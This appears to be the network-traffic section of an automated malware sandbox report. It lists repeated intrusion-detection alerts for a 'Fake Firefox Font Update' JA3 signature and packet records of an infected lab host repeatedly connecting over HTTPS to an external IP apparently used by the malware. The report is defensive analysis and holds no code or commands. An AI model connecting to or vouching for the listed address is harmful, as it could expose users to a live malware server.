          2024-11-26T08:11:33.621699+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64977050.7.187.218443TCP
          2024-11-26T08:11:35.800978+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64977850.7.187.218443TCP
          2024-11-26T08:11:38.069883+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64978550.7.187.218443TCP
          2024-11-26T08:11:40.254348+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64979250.7.187.218443TCP
          2024-11-26T08:11:42.434121+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64979950.7.187.218443TCP
          2024-11-26T08:11:44.605823+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64980650.7.187.218443TCP
          2024-11-26T08:11:46.781097+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64981250.7.187.218443TCP
          2024-11-26T08:11:48.955453+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64981950.7.187.218443TCP
          2024-11-26T08:11:51.142931+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64982650.7.187.218443TCP
          2024-11-26T08:11:53.230697+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64983350.7.187.218443TCP
          2024-11-26T08:11:55.382503+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64983950.7.187.218443TCP
          2024-11-26T08:11:57.469838+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64984550.7.187.218443TCP
          2024-11-26T08:11:59.684835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64985250.7.187.218443TCP
          2024-11-26T08:12:01.895489+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64985950.7.187.218443TCP
          2024-11-26T08:12:03.977085+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64986750.7.187.218443TCP
          2024-11-26T08:12:06.305080+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64987450.7.187.218443TCP
          2024-11-26T08:12:08.798340+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64988050.7.187.218443TCP
          2024-11-26T08:12:10.965822+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64988750.7.187.218443TCP
          2024-11-26T08:12:13.341006+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64989450.7.187.218443TCP
          2024-11-26T08:12:15.494269+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64990150.7.187.218443TCP
          2024-11-26T08:12:17.724462+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64990850.7.187.218443TCP
          2024-11-26T08:12:19.929032+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64991550.7.187.218443TCP
          2024-11-26T08:12:22.115166+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64992250.7.187.218443TCP
          2024-11-26T08:12:24.245099+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64992950.7.187.218443TCP
          2024-11-26T08:12:26.450205+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64993650.7.187.218443TCP
          2024-11-26T08:12:28.625681+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64994350.7.187.218443TCP
          2024-11-26T08:12:30.796189+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64995050.7.187.218443TCP
          2024-11-26T08:12:32.969436+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64995750.7.187.218443TCP
          2024-11-26T08:12:35.120345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64996450.7.187.218443TCP
          2024-11-26T08:12:37.475728+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64997150.7.187.218443TCP
          2024-11-26T08:12:39.583563+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64997950.7.187.218443TCP
          2024-11-26T08:12:41.748298+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64998650.7.187.218443TCP
          2024-11-26T08:12:43.888557+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64999350.7.187.218443TCP
          2024-11-26T08:12:46.022721+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65000050.7.187.218443TCP
          2024-11-26T08:12:48.152774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65000750.7.187.218443TCP
          2024-11-26T08:12:50.278727+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65001450.7.187.218443TCP
          2024-11-26T08:12:52.422056+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65002050.7.187.218443TCP
          2024-11-26T08:12:54.490537+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65002750.7.187.218443TCP
          2024-11-26T08:12:56.649069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65003350.7.187.218443TCP
          2024-11-26T08:12:58.769830+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65004050.7.187.218443TCP
          2024-11-26T08:13:00.903306+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65004750.7.187.218443TCP
          2024-11-26T08:13:03.301313+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65005450.7.187.218443TCP
          2024-11-26T08:13:05.421743+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65006150.7.187.218443TCP
          2024-11-26T08:13:07.488315+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65006550.7.187.218443TCP
          2024-11-26T08:13:09.615877+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.65007250.7.187.218443TCP
          TimestampSource PortDest PortSource IPDest IP
          Nov 26, 2024 08:11:07.865792990 CET49707443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:07.865864038 CET4434970750.7.187.218192.168.2.6
          Nov 26, 2024 08:11:07.865967035 CET49707443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:07.866214991 CET49707443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:07.866293907 CET4434970750.7.187.218192.168.2.6
          Nov 26, 2024 08:11:07.866391897 CET49707443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:07.956790924 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:07.956842899 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:07.956923008 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:07.983814955 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:07.983850956 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.360724926 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.360851049 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:09.364759922 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:09.364777088 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.365206957 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.415882111 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:09.455642939 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:09.503330946 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.861273050 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.861350060 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.861438990 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:09.904341936 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:09.904365063 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:09.904383898 CET49708443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:09.904392004 CET4434970850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:10.156047106 CET49710443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:10.156074047 CET4434971050.7.187.218192.168.2.6
          Nov 26, 2024 08:11:10.156213045 CET49710443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:10.166474104 CET49710443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:10.166526079 CET4434971050.7.187.218192.168.2.6
          Nov 26, 2024 08:11:10.166591883 CET49710443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:10.227149963 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:10.227200985 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:10.227279902 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:10.227684021 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:10.227698088 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:11.638648033 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:11.638736010 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:11.640172958 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:11.640182972 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:11.640424013 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:11.641854048 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:11.683332920 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.157558918 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.157643080 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.157706022 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.158030033 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.158030033 CET49711443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.158056974 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.158070087 CET4434971150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.390028000 CET49712443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.390068054 CET4434971250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.390192986 CET49712443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.390394926 CET49712443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.390439034 CET4434971250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.390546083 CET49712443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.502659082 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.502720118 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:12.502798080 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.503673077 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:12.503690958 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:13.914422035 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:13.914572001 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:13.916228056 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:13.916239023 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:13.916563988 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:13.918370962 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:13.959336996 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:14.433383942 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:14.433470964 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:14.433536053 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.433854103 CET49713443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.433867931 CET4434971350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:14.659316063 CET49714443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.659369946 CET4434971450.7.187.218192.168.2.6
          Nov 26, 2024 08:11:14.659468889 CET49714443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.659550905 CET49714443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.659626007 CET4434971450.7.187.218192.168.2.6
          Nov 26, 2024 08:11:14.659689903 CET49714443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.669014931 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.669044971 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:14.669131041 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.669419050 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:14.669431925 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.082468033 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.082567930 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.084949970 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.084963083 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.085290909 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.086834908 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.131339073 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.601118088 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.601214886 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.601325035 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.601632118 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.601653099 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.601670027 CET49715443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.601677895 CET4434971550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.825866938 CET49717443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.825923920 CET4434971750.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.826051950 CET49717443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.826448917 CET49717443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.826508045 CET4434971750.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.826580048 CET49717443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.848104954 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.848191977 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:16.848299980 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.848728895 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:16.848746061 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.223051071 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.223134041 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:18.224688053 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:18.224694967 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.225043058 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.226680040 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:18.271342993 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.732131004 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.732348919 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.732424021 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:18.755297899 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:18.755343914 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.755363941 CET49718443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:18.755382061 CET4434971850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.948504925 CET49724443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:18.948548079 CET4434972450.7.187.218192.168.2.6
          Nov 26, 2024 08:11:18.948632956 CET49724443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:19.202749968 CET49724443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:19.202950001 CET4434972450.7.187.218192.168.2.6
          Nov 26, 2024 08:11:19.203011036 CET49724443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:19.250534058 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:19.250580072 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:19.250655890 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:19.251152992 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:19.251169920 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:20.675066948 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:20.675162077 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:20.676548004 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:20.676553965 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:20.677442074 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:20.682183027 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:20.723340034 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.190418005 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.190516949 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.190572023 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.190828085 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.190843105 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.190855026 CET49725443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.190861940 CET4434972550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.386684895 CET49732443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.386722088 CET4434973250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.386799097 CET49732443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.398225069 CET49732443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.398299932 CET4434973250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.398370981 CET49732443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.409395933 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.409472942 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:21.409559965 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.410084009 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:21.410113096 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:22.868468046 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:22.868570089 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:22.869817019 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:22.869843006 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:22.870110035 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:22.871260881 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:22.911376953 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.396799088 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.397001982 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.397077084 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.397524118 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.397542000 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.397562981 CET49733443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.397568941 CET4434973350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.591083050 CET49741443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.591141939 CET4434974150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.591229916 CET49741443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.591422081 CET49741443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.591548920 CET4434974150.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.591691971 CET49741443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.600400925 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.600444078 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:23.601186037 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.601480961 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:23.601499081 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.014661074 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.014734983 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.016510963 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.016522884 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.016963005 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.018258095 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.059345961 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.537318945 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.537508011 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.537616014 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.538049936 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.538067102 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.538079023 CET49742443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.538086891 CET4434974250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.746678114 CET49748443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.746736050 CET4434974850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.746855974 CET49748443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.747015953 CET49748443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.747109890 CET4434974850.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.747262955 CET49748443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.757616043 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.757653952 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:25.757725954 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.758227110 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:25.758255959 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.172213078 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.172305107 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.182656050 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.182666063 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.183032990 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.188138962 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.235327005 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.690432072 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.690521955 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.690622091 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.691214085 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.691232920 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.691245079 CET49749443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.691251040 CET4434974950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.917001963 CET49755443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.917058945 CET4434975550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.917160034 CET49755443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.917294025 CET49755443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:27.917354107 CET4434975550.7.187.218192.168.2.6
          Nov 26, 2024 08:11:27.921094894 CET49755443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:28.013684988 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:28.013808012 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:28.013916969 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:28.017663956 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:28.017703056 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.389709949 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.389803886 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:29.393482924 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:29.393497944 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.393837929 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.403398991 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:29.451328993 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.896450043 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.896632910 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.896711111 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:29.896831989 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:29.896878004 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:29.896933079 CET49756443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:29.896950006 CET4434975650.7.187.218192.168.2.6
          Nov 26, 2024 08:11:30.098814011 CET49762443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:30.098886967 CET4434976250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:30.098952055 CET49762443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:30.103437901 CET49762443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:30.103502035 CET4434976250.7.187.218192.168.2.6
          Nov 26, 2024 08:11:30.103554010 CET49762443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:30.114718914 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:30.114768982 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:30.114837885 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:30.115389109 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:30.115403891 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:31.526273012 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:31.526426077 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:31.528182030 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:31.528192043 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:31.528484106 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:31.541974068 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:31.587327003 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.045440912 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.045519114 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.045567036 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.045830965 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.045840979 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.045878887 CET49763443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.045882940 CET4434976350.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.239624023 CET49769443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.239653111 CET4434976950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.239725113 CET49769443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.239836931 CET49769443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.239906073 CET4434976950.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.239968061 CET49769443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.249804974 CET49770443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.249826908 CET4434977050.7.187.218192.168.2.6
          Nov 26, 2024 08:11:32.249916077 CET49770443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.250243902 CET49770443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:32.250255108 CET4434977050.7.187.218192.168.2.6
          Nov 26, 2024 08:11:33.621586084 CET4434977050.7.187.218192.168.2.6
          Nov 26, 2024 08:11:33.621699095 CET49770443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:33.623260975 CET49770443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:33.623277903 CET4434977050.7.187.218192.168.2.6
          Nov 26, 2024 08:11:33.623536110 CET4434977050.7.187.218192.168.2.6
          Nov 26, 2024 08:11:33.624824047 CET49770443192.168.2.650.7.187.218
          Nov 26, 2024 08:11:33.667335987 CET4434977050.7.187.218192.168.2.6
